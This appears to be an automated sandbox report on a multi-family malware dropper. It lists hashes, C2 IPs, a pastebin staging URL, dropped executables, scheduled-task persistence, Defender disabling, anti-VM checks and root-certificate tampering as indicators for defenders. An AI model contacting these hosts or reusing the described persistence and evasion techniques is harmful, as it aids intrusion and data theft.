dcrat | 82fbb67bf03714661b75a49245c8fe42141e7b68dda3f97f765eb1f2e00a89a9

Resubmissions

09-04-2024 07:01

240409-htps3scd2w 10

09-04-2024 07:01

09-04-2024 07:00

09-04-2024 07:00

07-03-2024 22:29

Analysis

max time kernel
22s
max time network
522s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
09-04-2024 07:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score

10^/10

dcrat metasploit quasar redline risepro xworm zgrat 6077866846 backdoor discovery evasion infostealer persistence rat spyware stealer themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

6077866846

https://pastebin.com/raw/KE5Mft0T

Extracted

Family

metasploit

Version

metasploit_stager

91.92.247.21:8405

Extracted

Family

xworm

94.156.8.213:58002

Attributes

Install_directory
%Public%
install_file
svchost.exe

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
C:\Users\Admin\AppData\Local\WindowsHealthSystem.exe	family_xworm

Detect ZGRat V1 30 IoCs

Processes:

resource	yara_rule
behavioral1/memory/1836-720-0x000000001C200000-0x000000001C476000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-727-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-728-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-730-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-732-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-735-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-737-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-739-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-741-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-743-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-745-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-749-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-751-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-753-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-755-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-757-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-759-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-761-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-763-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-765-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-767-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-769-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-771-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-773-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-775-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-777-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-781-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-783-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-786-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1
behavioral1/memory/1836-788-0x000000001C200000-0x000000001C471000-memory.dmp	family_zgrat_v1

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2012	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2812	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2016	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2616	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3196	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3344	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4048	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3272	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3620	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3096	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3172	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3448	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3784	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2036	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	3032	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3584	3032	schtasks.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/3024-229-0x00000000000E0000-0x0000000000102000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\a\mk.exe	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\Saved Games\smss.exe	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

mQxBvlTA.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mQxBvlTA.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mQxBvlTA.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mQxBvlTA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mQxBvlTA.exe

Executes dropped EXE 14 IoCs

Processes:

mQxBvlTA.exexIPJVPDq.exeVoSjPBcc.execrypted6077866846MVYQY.exei1gcbW1E.exedisable-defender.exepclient.exeresponsibilitylead.exeMStore.exeProps.exewininit.exe1234.exeISetup8.exetest2.exe

pid	process
2464	mQxBvlTA.exe
2720	xIPJVPDq.exe
1552	VoSjPBcc.exe
3024	crypted6077866846MVYQY.exe
452	i1gcbW1E.exe
1200	disable-defender.exe
1592	pclient.exe
1836	responsibilitylead.exe
2276	MStore.exe
392	Props.exe
2732	wininit.exe
3036	1234.exe
680	ISetup8.exe
2144	test2.exe

Loads dropped DLL 14 IoCs

Processes:

xIPJVPDq.exeNew Text Document mod.exepclient.exe

pid	process
2720	xIPJVPDq.exe
2720	xIPJVPDq.exe
2784	New Text Document mod.exe
2784	New Text Document mod.exe
2784	New Text Document mod.exe
2680
2784	New Text Document mod.exe
1592	pclient.exe
2784	New Text Document mod.exe
2060
2784	New Text Document mod.exe
2784	New Text Document mod.exe
2784	New Text Document mod.exe
2784	New Text Document mod.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe	themida
behavioral1/memory/2464-149-0x0000000001280000-0x000000000239C000-memory.dmp	themida
behavioral1/memory/2464-150-0x0000000001280000-0x000000000239C000-memory.dmp	themida

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wr.exe	upx

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 141.98.234.31
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

description	ioc
Destination IP	141.98.234.31

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

pclient.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	pclient.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

mQxBvlTA.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service
T1102

Processes:

flow ioc

514 pastebin.com
14 raw.githubusercontent.com
15 raw.githubusercontent.com
28 pastebin.com
29 pastebin.com
331 pastebin.com
335 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

93 ip-api.com

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mQxBvlTA.exe

flow	ioc
514	pastebin.com
14	raw.githubusercontent.com
15	raw.githubusercontent.com
28	pastebin.com
29	pastebin.com
331	pastebin.com
335	pastebin.com

flow	ioc
93	ip-api.com

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe	autoit_exe

Drops file in System32 directory 1 IoCs

Processes:

MStore.exe

description ioc process

File created C:\Windows\SysWOW64\MService.exe MStore.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

mQxBvlTA.exe

pid process

2464 mQxBvlTA.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

2812 sc.exe
844 sc.exe
1136 sc.exe
1680 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	ioc	process
File created	C:\Windows\SysWOW64\MService.exe	MStore.exe

pid	process
2812	sc.exe
844	sc.exe
1136	sc.exe
1680	sc.exe

Program crash 8 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
924	488	WerFault.exe	Adobe_update.exe
2332	2796	WerFault.exe	crypted_097f1784.exe
2272	1604	WerFault.exe	crypted_33cb9091.exe
3296	4004	WerFault.exe	crypted_69a30000.exe
1916	3188	WerFault.exe	swiiiii.exe
3976	3700	WerFault.exe	koooooo.exe
2408	4032	WerFault.exe	LummaC2.exe
1264	4968	WerFault.exe	RegAsm.exe

Creates scheduled task(s) 1 TTPs 28 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2812	schtasks.exe
3196	schtasks.exe
3968	schtasks.exe
3584	schtasks.exe
4536	schtasks.exe
4416	schtasks.exe
2712	schtasks.exe
2276	schtasks.exe
2572	schtasks.exe
4048	schtasks.exe
3272	schtasks.exe
3784	schtasks.exe
2036	schtasks.exe
2016	schtasks.exe
2012	schtasks.exe
2036	schtasks.exe
3096	schtasks.exe
3172	schtasks.exe
3620	schtasks.exe
3192	schtasks.exe
1756	schtasks.exe
2812	schtasks.exe
2616	schtasks.exe
2540	schtasks.exe
2456	schtasks.exe
3344	schtasks.exe
3448	schtasks.exe
1692	schtasks.exe

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2272 timeout.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3372 taskkill.exe

pid	process
2272	timeout.exe

pid	process
3372	taskkill.exe

Modifies system certificate store 2 TTPs 14 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

mQxBvlTA.exeMStore.exeNew Text Document mod.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mQxBvlTA.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	mQxBvlTA.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	MStore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	MStore.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	New Text Document mod.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	New Text Document mod.exe
